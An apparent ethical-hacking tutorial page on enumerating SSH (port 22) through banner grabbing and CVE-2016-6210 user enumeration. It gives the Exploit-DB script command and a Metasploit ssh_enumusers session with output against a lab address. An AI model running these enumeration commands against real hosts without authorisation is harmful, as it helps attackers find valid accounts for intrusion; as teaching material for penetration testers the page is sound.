Port 22 – SSH

How to enumerate port 22 (SSH)

0

SSH is a very popular method to securely communicate with a remote host. SSH is old and basic technology so most recent versions are well secured. You can discover out the version of the SSH by scanning it with nmap or by connecting with it using nc.

nc 192.168.1.101 22

After connecting, you will get something like that, which reveal the SSH version:

SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu1

 

OpenSSH Vulnerability: CVE-2016-6210 

SSH before version 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.

Manual Exploit:

https://github.com/offensive-security/exploitdb/blob/master/exploits/linux/remote/40136.py

python 40136.py 192.168.1.101 -U /usr/share/wordlists/metasploit/unix_users.txt -e --trials 5 --bytes 10

Metasploit:

msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
USER_FILE => /usr/share/wordlists/metasploit/unix_users.txt
msf auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.1.101:22 - SSH - Checking for false positives
[*] 192.168.1.101:22 - SSH - Starting scan
[-] 192.168.1.101:22 - SSH - User '4Dgifts' not found
[-] 192.168.1.101:22 - SSH - User 'EZsetup' not found
[-] 192.168.1.101:22 - SSH - User 'secure' not found

Leave A Reply

Your email address will not be published.

SignupSubscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.

Subscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.